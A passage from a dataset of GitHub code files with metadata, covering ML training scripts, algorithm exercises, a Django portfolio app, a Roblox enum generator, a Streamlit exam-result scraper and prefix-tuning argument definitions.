list(loadWav(pFile))\n return LazyDataset(np.array(dryData), np.array(wetData))\n def doCheckPoint(model, name):\n model.fileOutput('./model_outputs/test.wav', \"./model_outputs/%d output.wav\" % name, testFile='model_outputs/processed/test.wav')\n torch.save(model.state_dict(), './model_checkpoints/%d.model' % name)\n\n model = ConvModel()\n CurrentData = loadData()\n for i, data in enumerate(CurrentData.randomSampler()):\n model.train(data)\n if model.iteration % globals.OUTPUT_FREQUENCY == 0:\n doCheckPoint(model, model.iteration)\n doCheckPoint(model, -1)\nmain()\n","repo_name":"KieranMcCool/MusicalEffectModelling-L4Project","sub_path":"Experiments/NeuralNetwork/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":5687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"23464583115","text":"def minsubarraysum(target, nums):\n\tleft = 0 \n\tresult = float('inf')\n\tvalsum = 0\n\n\tfor i in range(len(nums)):\n\t\tvalsum += nums[i]\n\t\twhile valsum >= target:\n\t\t\tresult = min(result, 
i+1-left)\n\t\t\tvalsum -= nums[left]\n\t\t\tleft+=1\n\n\tif result == float('inf'):\n\t\treturn 0\n\treturn result\n\n\t\n\nminsubarraysum(7,[2,3,1,2,4,3])","repo_name":"vishnubharadwaj00/AlgorithmsAndDataStructures","sub_path":"Leetcode/minsubarrsum.py","file_name":"minsubarrsum.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36854079751","text":"import argparse\nimport os\nimport random\nimport string\nimport webbrowser\nfrom time import sleep\n\nimport requests\n\nbase_api = f\"http://localhost:8088\"\n\n\ndef request_text(text_query):\n text_api = f\"{base_api}/display_text\"\n\n headers = {\n \"accept\": \"application/json\",\n \"content-type\": \"application/x-www-form-urlencoded\",\n }\n\n params = {\"text_query\": text_query}\n\n requests.post(text_api, params=params, headers=headers)\n\n\ndef request_image(image_file):\n image_api = f\"{base_api}/display_image\"\n image = open(image_file, \"rb\")\n files = {\"image_file\": image}\n\n response = requests.post(image_api, files=files)\n\n\nif __name__ == \"__main__\":\n # not in cache\n\n generated_strings = []\n length = 20\n images_file = os.listdir(\"/tmp/GLAMI-1M/GLAMI-1M-dataset/images/\")\n num_strings_query = 1000\n\n while len(generated_strings) < num_strings_query:\n characters = string.ascii_lowercase + string.digits\n random_string = \"\".join(random.sample(characters, length))\n if random_string not in generated_strings:\n generated_strings.append(random_string)\n\n for i in range(len(images_file)):\n request_image(\n os.path.join(\"/tmp/GLAMI-1M/GLAMI-1M-dataset/images/\", images_file[i])\n )\n request_text(generated_strings[i])\n sleep(1)\n\n # in cache\n # images_file = os.listdir(\"/tmp/GLAMI-1M/GLAMI-1M-dataset/images/\")\n # for i in range(len(images_file)):\n # request_image(\n # os.path.join(\"/tmp/GLAMI-1M/GLAMI-1M-dataset/images/\", images_file[1])\n # )\n # sleep(1)\n","repo_name":"duongngyn0510/text-image-retrieval","sub_path":"observable_systems/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"11722230164","text":"from numpy import sqrt, logspace, log10, zeros, linspace, pi, interp, exp, log\nfrom Model import J_lambda_prep, Ent_Volume, Ent_Volume_Z, max_entrainement, Ent_rate_prev, get_rise_speed\nfrom Utilities import findcLceta, ulambda_sq\nimport matplotlib.pyplot as plt\nfrom matplotlib.legend_handler import HandlerLine2D, HandlerTuple\nfrom scipy.io import loadmat\nfrom matplotlib.ticker import ScalarFormatter\nfrom scipy.integrate import quad\nfrom numba import jit #, float64\nimport matplotlib.pyplot as plt\nplt.rcParams[\"font.family\"] = \"Times New Roman\"\nplt.rcParams[\"mathtext.fontset\"] = \"stix\"\nfs=12\n\n##########################\n# PHYSICAL PARAMETERS #\n##########################\nkt=1.23; et=1.83; nu=1e-6; g=9.81; rhoc=1000; sig=0.072\ncL,cEta=findcLceta(kt,et,nu,mode=1)\nnlst=2000\nlst=logspace(-8,3,nlst);\tul2_lst=zeros(nlst) #with dimension!\nfor i in range(nlst):\n\tul2_lst[i]=ulambda_sq(lst[i],kt,et,cL,cEta,nu,pope_spec=1.01)\n# Load the depth table:\nTable=loadmat(\"UoIEntrainment.mat\"); color_lst=['black','red','blue']\n############################################################################\n#========================= Rising speed 
=========================#\n############################################################################\nnz=200; nl=3\nl_lst=[1e-2,1e-1,1]; wz_lst=zeros((nz,nl,4))\nl1=1e-8; l2=logspace(-7,3,100)\n@jit(nopython=True, cache=True)\ndef ulam_nlam(logl,kt,et,nu,cL,cEta,lst,ul2_lst,output):\n\tl=exp(logl)\n\tulamsq=interp(l,lst,ul2_lst)\n\tC=1.5;\tp0=2.0; be=5.2; k=2*pi/l\n\tL=kt**1.5/et; eta=(nu**3/et)**0.25\n\tfl = (k*L/((k*L)**2+cL)**0.5)**(5.0/3.0+p0)\n\tfeta= exp(-be*(((k*eta)**4+cEta**4)**0.25-cEta))\n\tEk = C*et**(2.0/3.0)*k**(-5.0/3.0)*fl*feta\n\tn_lam=24*Ek/(l**5*ulamsq)\n\tif output == 1: #numerator\n\t\treturn sqrt(ulamsq)*n_lam * l\n\telif output == 2: #denominator\n\t\treturn n_lam * l\nnumerator=zeros(100); denominator=zeros(100)\nfig=plt.figure(figsize=(6,3),dpi=300); ax1=fig.add_subplot(121); ax2=fig.add_subplot(122)\nfor i in range(100):\n\n\tnumerator[i] = quad(ulam_nlam, log(l1), log(l2[i]), args=(kt,et,nu,cL,cEta,lst,ul2_lst,1),\\\n\t limit = 200, epsrel=1e-6, epsabs=1.0e-10)[0]\n\tdenominator[i] = quad(ulam_nlam, log(l1), log(l2[i]), args=(kt,et,nu,cL,cEta,lst,ul2_lst,2),\\\n\t limit = 200, epsrel=1e-6, epsabs=1.0e-10)[0]\n\nax1.plot(l2,numerator,\tlabel='numerator')\nax2.plot(l2,denominator, label='denominator')\nax1.legend(); ax2.legend()\nax1.set_xscale('log'); ax1.set_yscale('log')\nax2.set_xscale('log'); ax2.set_yscale('log')\n# l2=5.1\n# ldebug=logspace(log10(l1),log10(l2),200); deno=zeros(200)\n# for i in range(200):\n# \tl=ldebug[i]\n# \tdeno[i]=ulam_nlam(l,kt,et,nu,cL,cEta,lst,ul2_lst,output=2)\n# \n# ax=fig.add_subplot(111)\n# ax.plot(ldebug,deno); ax.set_xscale('log'); ax.set_yscale('log')\n# denominator,abserr,infodict = quad(ulam_nlam, l1, l2, full_output=1,\\\n# args=(kt,et,nu,cL,cEta,lst,ul2_lst,2),\\\n# limit = 100, epsrel=1e-6, epsabs=1.0e-10)\n# # ax.plot(infodict['alist'],infodict['blist'],linestyle='none',marker='0')","repo_name":"yb8119/MITEntrainment","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39578051760","text":"\n\nfrom mydb.db import Database\n#\ndb = Database()\ndb.connect()\nplants = ['A001', 'A002', 'A003', 'A004', 'A005', 'A006', 'A007', 'A008', 'A009', 'A011']\n\nfor plant in plants:\n db.create_tables(plant)\ndb.close_conn()","repo_name":"Elvitz88/udbot","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13411106233","text":"from collections import deque\n\ncomputer = int(input())\nnetwork = int(input())\n\ngraph = [[] * computer for _ in range(computer + 1)]\nvisited = [False] * (computer + 1)\nq = deque()\n\nfor i in range(network):\n first, second = map(int, input().split())\n graph[first].append(second)\n graph[second].append(first)\n\n\ndef bfs(start):\n ans = 0\n q.append(start)\n visited[start] = True\n\n while q:\n f_node = q.popleft()\n\n for s_node in graph[f_node]:\n if not visited[s_node]:\n q.append(s_node)\n visited[s_node] = True\n ans += 1\n return ans\n\n\nprint(bfs(1))\n","repo_name":"SeungAh-Hong/algorithm-study-hyundai","sub_path":"Baekjoon/DFS_BFS/바이러스_장서윤.py","file_name":"바이러스_장서윤.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"15550156660","text":"'''\nTime complexity = O(N)\nSpace complexity = O(2^h-1)\n'''\n#BFS iterative 
solution\nfrom collections import deque\n\n#Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def invertTree(self, root: TreeNode) -> TreeNode:\n if not root:\n return root\n \n queue = deque()\n queue.append(root)\n \n while queue:\n node = queue.popleft()\n node.left, node.right = node.right, node.left\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n \n return root","repo_name":"knightrohit/leetcode_june_challenge_2020","sub_path":"01_Invert_binary_tree.py","file_name":"01_Invert_binary_tree.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"70997308290","text":"import os\n\n\ndef getEnums():\n\twith open(\"enumList.txt\") as f:\n\t\tenumList = f.read()\n\tenums = {}\n\tfor line in enumList.splitlines():\n\t\tsegments = line.split(\".\")\n\t\t# Enum.ENUM_NAME\t .ENUM_VALUE_NAME\n\t\tif enums.get(segments[1]) is None:\n\t\t\tenums[segments[1]] = []\n\t\tenums[segments[1]].append(segments[2])\n\treturn enums\n\n\ndef getLuaCode():\n\tenums = getEnums()\n\n\tenumsCode = \",\\n\\t\".join([\n\t\tf\"---@class {name} : EnumItem @ Really is type `Enum`\\n\\t\"\n\t\tf\"{name}={{\\n\\t\\t\"\n\t\tf\"GetEnumItems=_Enum.GetEnumItems,\\n\\t\\t\"\n\t\t+ \",\\n\\t\\t\".join([\n\t\t\tf\"{enum}={{Name=\\\"{enum}\\\",Value={_enums.index(enum)},EnumType=_Enum}}\"\n\t\t\tfor enum in _enums\n\t\t]) +\n\t\t\"\\n\\t}\"\n\t\tfor name, _enums in enums.items()\n\t])\n\treturn f\"\"\"\n\t-- Generated by {os.path.basename(__file__)}\n\t-- NOTE: the way the class's are defined are done for typing\n\n\t---@language Lua\n\tlocal codeForEnumList = [[\n\tfor _, enum in pairs(Enum:GetEnums()) do\n\t\tfor _, v in pairs(enum:GetEnumItems()) do\n\t\t\tprint(v)\n\t\tend\n\tend\n\t]]\n\n\t---@class EnumItem\n\tlocal _EnumItem = {{\n\t\t---@type string\n\t\tName=nil,\n\t\t---@type number\n\t\tValue=nil,\n\t\t---@type Enum\n\t\tEnumType=nil\n\t}}\n\t---@class Enum\n\tlocal _Enum = {{}}\n\t---@return EnumItem[]\n\tfunction _Enum:GetEnumItems() end\n\n\tEnum = {{\n\t\t{enumsCode}\n\t}}\n\t---@return Enum[]\n\tfunction Enum:GetEnums() end\"\"\".strip()\n\n\nif __name__ == \"__main__\":\n\tluaCode = getLuaCode()\n\twith open(\"api/Enum.lua\", \"w\") as f:\n\t\tf.write(luaCode)\n","repo_name":"Dude112113/RobloxApi-Definitions-Emmy","sub_path":"enumListToEmmy.py","file_name":"enumListToEmmy.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40255869887","text":"from django.shortcuts import render,redirect\nfrom django.conf import settings \nimport os\nfrom architect.models import *\nfrom django.http import FileResponse\nfrom django.core.mail import send_mail\n# Create your views here.\n\n\ndef BASE(request):\n return render(request, 'base.html')\n\ndef HOME(request):\n project = Project.objects.all()\n category = Category.objects.all()\n\n context = {'project': project, 'category': category}\n return render(request, 'Main/home.html', context)\n\ndef Download_CV(request):\n cv_file_path = os.path.join(settings.MEDIA_ROOT, 'PWMola_CV.pdf')\n response = FileResponse(open(cv_file_path, 'rb'), as_attachment=True)\n return response\n\ndef contact_form(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n email_address = request.POST.get('email')\n 
message = request.POST.get('message')\n\n # Send email\n subject = f\"Contact form submission from {name}\"\n message = f\"Name: {name}\\nEmail: {email_address}\\nMessage: {message}\"\n from_email = settings.DEFAULT_FROM_EMAIL\n recipient_list = [settings.DEFAULT_FROM_EMAIL] # Send email to your email address\n\n send_mail(subject, message, from_email, recipient_list, fail_silently=False)\n\n # Redirect or render a thank-you page\n return redirect('home') # Replace with the URL you want to redirect to","repo_name":"Suzan97/peter_portfolio","sub_path":"architect/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16595673612","text":"def main():\r\n t=int(input())\r\n while(t!=0):\r\n n=int(input())\r\n arr=list(map(int,input().split()))\r\n max_val=-1\r\n for i in range(0,n):\r\n for j in range(i+1,n):\r\n temp=arr[i]+arr[j]\r\n if(max_val 9:\n print('extra disks', server_id)\n sys.exit()\n\n if disk:\n equal = disk.find('=')\n space = disk.find(' ')\n name = disk[0:equal]\n size = int(disk[equal+1:space])\n\n sd = ServerDisk()\n sd.server_id = server_id\n sd.name = name\n sd.size = size\n sd.save()\n\n def add_data(self, xml, server):\n x = self.get_text(xml, 'MWregulateddatacheckboxe1', None)\n if x:\n print(x)\n\n x = self.get_text(xml, 'nonregulateddataDetail', None)\n if x:\n print(x)\n\n def process_record(self, row, type, service_id):\n\n d = Database()\n\n mc_group = row[1].strip(\"'\")\n d.shortcode = row[3].strip(\"'\")\n data = row[5].strip(\"'\")\n\n try:\n xml = ET.fromstring(data)\n except:\n print('error converting XML', data)\n return\n \n\n service_status = self.get_text(xml, 'servicestatus', None)\n if service_status == 'Ended':\n return\n #d.in_service = False\n elif service_status == 'Active':\n d.in_service = True\n else:\n d.service_status = None\n print('service status', service_status)\n\n \n size = self.get_text(xml, 'MDDBSize', None)\n if size:\n size = size.replace('GB','')\n size = int(size)\n d.size = size\n\n\n d.legacy_data = data\n d.name = self.get_text(xml, 'xmlSubscriptionKey', None) #instancename?\n d.owner = LDAPGroup().lookup( mc_group )\n d.support_email = self.get_text(xml, 'afterhoursemail', 'n/a')\n d.support_phone = self.get_text(xml, 'afterhoursphone', 'n/a')\n #d.cpu = self.get_text(xml, 'cpu', 0)\n #d.ram = self.get_text(xml, 'ram', 0)\n\n d.url = self.get_text(xml, 'databaseURL', None)\n\n on_call = self.get_text(xml, 'monitoringsystem', None)\n if on_call == 'businesshours':\n d.on_call = 0\n elif on_call == '247':\n d.on_call = 1\n else:\n print('warning on_call ', on_call, 'not found')\n\n\n\n d.purpose = self.get_text(xml, 'databasepurpose', '')\n\n\n if self.get_text(xml, 'MDsharedordedicated', None) == 'dedicated':\n try:\n d.server = Server.objects.get(name=d.name)\n except:\n print('Server not found', d.name)\n\n type = self.get_text(xml, 'MDDBType', None)\n if type:\n d.type_id = self.database_types.get(type.upper())\n\n try:\n d.save()\n self.LOADS +=1\n #self.add_disks(xml, d.id)\n #self.add_data(xml)\n except Exception as ex:\n print('insert error', ex)\n print(data)\n self.ERRORS +=1\n\n #print(f'{self.LOADS} records Loaded, {self.ERRORS} errors')\n\n\n def add_members(self):\n groups = StorageInstance.objects.distinct('owner')\n\n for group in groups: # Loop through distinct groups\n members = get_mc_group(group.owner) # Pull member list from MCommunity\n print(group.owner)\n if not members == 
None:\n usernames = []\n for member in members['member']:\n usernames.append(member[4:member.find(',', 0, 99)])\n #print('add', members['member'])\n\n usernames = list( dict.fromkeys(usernames) )\n \n \n instance_list = StorageInstance.objects.filter(owner=group.owner)\n for instance in instance_list: # Add members to all instances using that MC group\n print(instance)\n for username in usernames:\n print(' ', username)\n sm = StorageMember()\n sm.storage_instance = instance\n sm.username = username\n sm.save()\n","repo_name":"ITSComm-Information-Systems/srs","sub_path":"project/management/commands/import_databases.py","file_name":"import_databases.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15124219367","text":"import pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nimport streamlit as st\n\nhtml = \"\"\"\n
    FETCHING RESULT\n\"\"\"\nst.markdown(html, unsafe_allow_html=True)\nst.subheader(' ') \n\ncol = ['English (Communication Skills)','Punjabi (Compulsory)','Hindi','Sociology','Cosmetology','History','Political Science',\n 'Punjabi Literature','Music (Vocal)','Physical Education','English Literature','Computer Applications','Economics','Mathematics','Total']\n\ncolumns2 = col.copy() \n#del columns2[-2:]\n\ndf = pd.DataFrame(columns=columns2)\n\nst.markdown(\"\"\"
    Enter URL
    \"\"\", unsafe_allow_html=True)\nuser_url = st.text_input('')\n\nst.markdown(\"\"\"
    Enter First Roll Number
    \"\"\", unsafe_allow_html=True)\nfrno = st.number_input('', min_value=10, max_value=100000) \n\nst.markdown(\"\"\"
    Enter Last Roll Number
    \"\"\", unsafe_allow_html=True)\nsrno = st.number_input(' ', min_value=10, max_value=100000) \n\nurl = []\nfor i in range(frno,srno+1):\n #url2=user_url+str(i)+\"&submit=Submit\"\n url.append(user_url+str(i)+\"&submit=Submit\") \n\n#df.to_csv('Result.csv')\nst.subheader(' ')\nbutton = st.button('Create File')\nif button:\n st.markdown(\"\"\"
    PLEASE WAIT THIS MAY TAKE FEW MINUTES.....
    \"\"\", unsafe_allow_html=True)\n\n dn=[]\n name=[]\n roll_no=[]\n Result=[]\n for ur in url:\n df2=pd.DataFrame(columns=columns2)\n res = requests.get(ur)\n soup = BeautifulSoup(res.text,'html.parser')\n name.append(soup.find('td',{'class':'c3'}).text)\n roll_no.append(ur[-19:-14])\n result = [i.text for i in soup.select('div > b > span')]\n Result.append(result[0])\n n = soup.find('table',{'class':'enf'})\n headers = [tr.text for tr in n.select(\"tr td\")] \n for subject in (9,18,27,36,45,72,81,90): #(17,26,35,44,53,80,89,98) values\n df2[headers[subject]] = [headers[subject+8]]\n dn.append(df2)\n df = pd.concat(dn,axis=0,sort=False)\n\n df.insert(0,'Name',name)\n df.insert(1,'Roll No',roll_no) \n df.insert(18,'Result',Result)\n \n df.to_excel('Result.xlsx')\n st.markdown(\"\"\"
    DONE !!
    \"\"\", unsafe_allow_html=True)\n","repo_name":"koshalnirwan/Web-Scraping","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40378237957","text":"import logging\nimport math\nimport os, transformers, torch\nimport pickle\nimport sys\n\nfrom transformers.data.data_collator import DataCollatorForCLModeling, DataCollatorForTopicClusterLanguageModeling, DataCollatorForProtoClusterLanguageModeling\n\nfrom PrefixTuning.transformers.examples.control.tokenization import WordTokenizer\n\nsys_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\nsys.path.append(sys_path)\nsys_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(sys_path)\nsys_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(sys_path)\nprint (sys.path)\nimport numpy as np\nfrom dataclasses import dataclass, field\nfrom typing import Optional\n\nfrom transformers.data.datasets.language_modeling import LineByLineUnderstandTextDataset, \\\n LineByLineUnderstandFrontTextDataset, LineByLineCLDataset, LineByLineTopicDataset, LineByLineNoRelDataset, \\\n LineByLineProtoDataset, LineByLinePrivacyDataset\n\nfrom .train_control import PrefixTuning, ClassificationHead, PrefixEmbTuning\nfrom transformers.file_utils import cached_path\n\nimport glob\n\npath = os.path.abspath(transformers.__file__)\n\nfrom transformers import (\n CONFIG_MAPPING,\n MODEL_WITH_LM_HEAD_MAPPING,\n AutoConfig,\n AutoModelWithLMHead,\n AutoTokenizer,\n DataCollatorForLanguageModeling,\n DataCollatorForPermutationLanguageModeling,\n DataCollatorForWeightedLanguageModeling, # modified\n DataCollatorForEmbMatchLanguageModeling, # modified\n DataCollatorForTopicLanguageModeling, # modified\n DataCollatorForLengthLanguageModeling, # modified\n DataCollatorForKeywordLanguageModeling, # modified\n DataCollatorForData2TextLanguageModeling, # modified\n DataCollatorForText2DataLanguageModeling, # modified\n DataCollatorForWritingPromptsLanguageModeling, # modified\n DataCollatorForClassificationSentimentLanguageModeling, # modified\n DataCollatorForSumLanguageModeling, # modified\n HfArgumentParser,\n LineByLineTextDataset,\n LineByLineWithWeightTextDataset, # modified\n LineByLineEmbMatchTextDataset, # modified\n LineByLineTopicTextDataset, # modified\n LineByLineKeywordTextDataset, # modified\n LineByLineLengthTextDataset, # modified\n LineByLineData2TextTextDataset, # modified\n LineByLineLemma2TextTextDataset, # modified\n LineByLineText2DataTextDataset, # modified\n LineByLineTriplesTextDataset, # modified\n LineByLineWebNLGTextDataset, # modified\n LineByLineWritingPromptsTextDataset, # modified\n LineByLineSentimentTextDataset, # modified\n LineByLineClassificationSentimentTextDataset, # modified\n LineByLineClassificationTopicTextDataset,\n LineByLineSumTextDataset, # modified\n PreTrainedTokenizer,\n TextDataset,\n Trainer,\n Trainer_Prefix,\n TrainingArguments,\n set_seed,\n GPT2LMHeadModel,\n BertTokenizerFast,\n BertModel,\n AutoModelForSequenceClassification,\n GPT2LMHeadModelAdapter, BertTokenizer,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nMODEL_CONFIG_CLASSES = list(MODEL_WITH_LM_HEAD_MAPPING.keys())\nMODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)\n\n@dataclass\nclass ModelArguments:\n \"\"\"\n Arguments pertaining to which model/config/tokenizer we are going to 
fine-tune, or train from scratch.\n \"\"\"\n\n model_name_or_path: Optional[str] = field(\n default=None,\n metadata={\n \"help\": \"The model checkpoint for weights initialization. Leave None if you want to train a model from scratch.\"\n },\n )\n prefixModel_name_or_path: Optional[str] = field(\n default=None,\n metadata={\n \"help\": \"The prefix model checkpoint for weights initialization. \"\n \"Leave None if you want to train a model from scratch.\"\n },\n )\n\n prefix_mode: Optional[str] = field(\n default='activation',\n metadata={\n \"help\": \"activation or embedding\"\n },\n )\n\n\n\n preseqlen: Optional[int] = field(\n default=0,\n metadata={\n \"help\": \"preseqlen for how many tokens of prefix should we include.\"\n },\n )\n\n optim_prefix: Optional[str] = field(\n default='no',\n metadata={\n \"help\": \"whether we are optimizing the prefix directly, or optimize another amortized function that \"\n \"genrate the prefix.\"\n },\n )\n\n\n\n tuning_mode: Optional[str] = field(\n default='finetune',\n metadata={\n \"help\": \"whether it's doing prefixtune or finetune.\"\n },\n )\n\n objective_mode: Optional[int] = field(\n default=0,\n metadata={\n \"help\": \"In prefixtuning setting, the objective function... \"\n },\n )\n\n top_layers: Optional[int] = field(\n default=2,\n metadata={\n \"help\": \"In finetuning setting, if we only tune the top k layers. \"\n },\n )\n\n adapter_design: Optional[int] = field(\n default=2,\n metadata={\n \"help\": \"For Baseline of the adapter module... (1) means using the NLG adapter reference. \"\n \"(2) means using a design similar to adapter module\"\n },\n )\n\n adapter_bottleneck: Optional[int] = field(\n default=100,\n metadata={\n \"help\": \"For baseline adapter module: the mid dim of the adapter. \"\n },\n )\n\n parametrize_emb: Optional[str] = field(\n default='MLP',\n metadata={\n \"help\": \"MLP or Emb to parametrize when we optimize for the embeddings.\"\n },\n )\n\n prefix_dropout: Optional[float] = field(\n default=0.0,\n metadata={\n \"help\": \"dropout rate for the prefix tuning model. \"\n },\n )\n\n init_random: Optional[str] = field(\n default='no',\n metadata={\n \"help\": \"whether to init a random embedding, or use GPT2 embedding for the prefix tuning model. \"\n },\n )\n\n use_dropout: Optional[str] = field(\n default='no',\n metadata={\n \"help\": \"whether to use dropout of GPT2 on trainer. 
\"\n },\n )\n\n mid_dim: Optional[int] = field(\n default=512,\n metadata={\n \"help\": \"the mid dim.\"\n },\n )\n\n dataless_sample_size: Optional[int] = field(\n default=8,\n metadata={\n \"help\": \"the size of samples for each class in dataless training.\"\n },\n )\n\n gumbel: Optional[str] = field(\n default='no',\n metadata={\n \"help\": \"use the gumbel softmax trick in training.\"\n },\n )\n\n replay_buffer: Optional[str] = field(\n default='no',\n metadata={\n \"help\": \"use the replay buffer in training.\"\n },\n )\n\n training_obj: Optional[int] = field(\n default=0,\n metadata={\n \"help\": \"use a specified training objective\"\n },\n )\n\n\n dataless_sample_length: Optional[int] = field(\n default=20,\n metadata={\n \"help\": \"the length of samples for each class in dataless training.\"\n },\n )\n\n dataless_control_type: Optional[int] = field(\n default=0,\n metadata={\n \"help\": \"the type of control in dataless training.\"\n },\n )\n\n dataless_usebaseline: Optional[str] = field(\n default='yes',\n metadata={\n \"help\": \"use baseline in dataless training.\"\n },\n )\n\n\n dataless_discri_model_path: Optional[str] = field(\n default='textattack/roberta-base-imdb',\n metadata={\n \"help\": \"the path to discri_model and discri_tokenizer\"\n },\n )\n\n model_type: Optional[str] = field(\n default=None,\n metadata={\"help\": \"If training from scratch, pass a model type from the list: \" + \", \".join(MODEL_TYPES)},\n )\n config_name: Optional[str] = field(\n default=None, metadata={\"help\": \"Pretrained config name or path if not the same as model_name\"}\n )\n tokenizer_name: Optional[str] = field(\n default=None, metadata={\"help\": \"Pretrained tokenizer name or path if not the same as model_name\"}\n )\n cache_dir: Optional[str] = field(\n default=None, metadata={\"help\": \"Where do you want to store the pretrained models downloaded from s3\"}\n )\n\n\n@dataclass\nclass DataTrainingArguments:\n \"\"\"\n Arguments pertaining to what data we are going to input our model for training and eval.\n \"\"\"\n\n train_data_file: Optional[str] = field(\n default=None, metadata={\"help\": \"The input training data file (a text file).\"}\n )\n eval_data_file: Optional[str] = field(\n default=None,\n metadata={\"help\": \"An optional input evaluation data file to evaluate the perplexity on (a text file).\"},\n )\n line_by_line: bool = field(\n default=False,\n metadata={\"help\": \"Whether distinct lines of text in the dataset are to be handled as distinct sequences.\"},\n )\n\n mlm: bool = field(\n default=False, metadata={\"help\": \"Train with masked-language modeling loss instead of language modeling.\"}\n )\n mlm_probability: float = field(\n default=0.15, metadata={\"help\": \"Ratio of tokens to mask for masked language modeling loss\"}\n )\n plm_probability: float = field(\n default=1 / 6,\n metadata={\n \"help\": \"Ratio of length of a span of masked tokens to surrounding context length for permutation language modeling.\"\n },\n )\n max_span_length: int = field(\n default=5, metadata={\"help\": \"Maximum length of a span of masked tokens for permutation language modeling.\"}\n )\n\n task_mode: Optional[str] = field(\n default=None, metadata={\"help\": \"The task mode\"}\n )\n\n format_mode: Optional[str] = field(\n default='cat', metadata={\"help\": \"The mode of data2text format (cat, peek, nopeek)\"}\n )\n\n lowdata_token: Optional[str] = field(\n default='summarize', metadata={\"help\": \"The token to be prepended at initialization time. 
\"}\n )\n\n use_lowdata_token: Optional[str] = field(\n default='yes', metadata={\"help\": \"Whether we should use the lowdata token and pass it to the prefixTuning Model \"\n \"for the initialization trick. \"}\n )\n\n dataless: Optional[str] = field(\n default='no', metadata={\"help\": \"Whether we are training or loading dataless model.\"}\n )\n\n train_embs: Optional[str] = field(\n default='no', metadata={\"help\": \"whether the train word embeddings\"}\n )\n\n max_source_length: Optional[int] = field(\n default=512, metadata={\"help\": \"the max source length of summarization data. \"}\n )\n\n train_max_target_length: Optional[int] = field(\n default=100, metadata={\"help\": \"the max target length for training data. \"}\n )\n\n val_max_target_length: Optional[int] = field(\n default=100, metadata={\"help\": \"the max target length for dev data. \"}\n )\n\n # controlprefix: Optional[str] = field(\n # default=\"yes\", metadata={\"help\": \"The control mode\"}\n # )\n\n block_size: int = field(\n default=-1,\n metadata={\n \"help\": \"Optional input sequence length after tokenization.\"\n \"The training dataset will be truncated in block of this size for training.\"\n \"Default to the model max input length for single sentence inputs (take into account special tokens).\"\n },\n )\n overwrite_cache: bool = field(\n default=False, metadata={\"help\": \"Overwrite the cached training and evaluation sets\"}\n )\n\ndef get_dataset(\n args: DataTrainingArguments,\n tokenizer: PreTrainedTokenizer,\n sentence_tokenizer: WordTokenizer,\n label_id_List,\n label_list,\n sentence_list,\n evaluate: bool = False,\n cache_dir: Optional[str] = None,\n iterations: int = 0,\n classes_per_it:int = 0,\n sample_per_class:int = 0,\n max_seq_length:int = 0,\n data_type:str = None\n):\n file_path = args.eval_data_file if evaluate else args.train_data_file\n if args.line_by_line:\n if args.task_mode == 'cl':\n dataset = LineByLineCLDataset(tokenizer=tokenizer,sentence_tokenizer = sentence_tokenizer, label_id_List= label_id_List,\n label_list=label_list, sentence_list=sentence_list,\n block_size=args.block_size, bos_tok=tokenizer.bos_token,\n eos_tok=tokenizer.eos_token, max_source_length = max_seq_length,\n max_target_length = max_seq_length)\n elif args.task_mode == 'no_hidden' and data_type=='privacy':\n dataset = LineByLinePrivacyDataset(tokenizer=tokenizer,sentence_tokenizer = sentence_tokenizer, label_id_List= label_id_List,\n label_list=label_list, sentence_list=sentence_list,\n block_size=args.block_size, bos_tok=tokenizer.bos_token,\n eos_tok=tokenizer.eos_token, max_source_length = max_seq_length,\n max_target_length = max_seq_length)\n elif data_type=='privacy':\n dataset = LineByLinePrivacyDataset(tokenizer=tokenizer,sentence_tokenizer = sentence_tokenizer, label_id_List= label_id_List,\n label_list=label_list, sentence_list=sentence_list,\n block_size=args.block_size, bos_tok=tokenizer.bos_token,\n eos_tok=tokenizer.eos_token, max_source_length = max_seq_length,\n max_target_length = max_seq_length)\n elif args.task_mode == 'topic' or args.task_mode == 'no_hidden' or args.task_mode == 'casual_lens':\n dataset = LineByLineTopicDataset(tokenizer=tokenizer,sentence_tokenizer = sentence_tokenizer, label_id_List= label_id_List,\n label_list=label_list, sentence_list=sentence_list,\n block_size=args.block_size, bos_tok=tokenizer.bos_token,\n eos_tok=tokenizer.eos_token, max_source_length = max_seq_length,\n max_target_length = max_seq_length)\n elif args.task_mode == 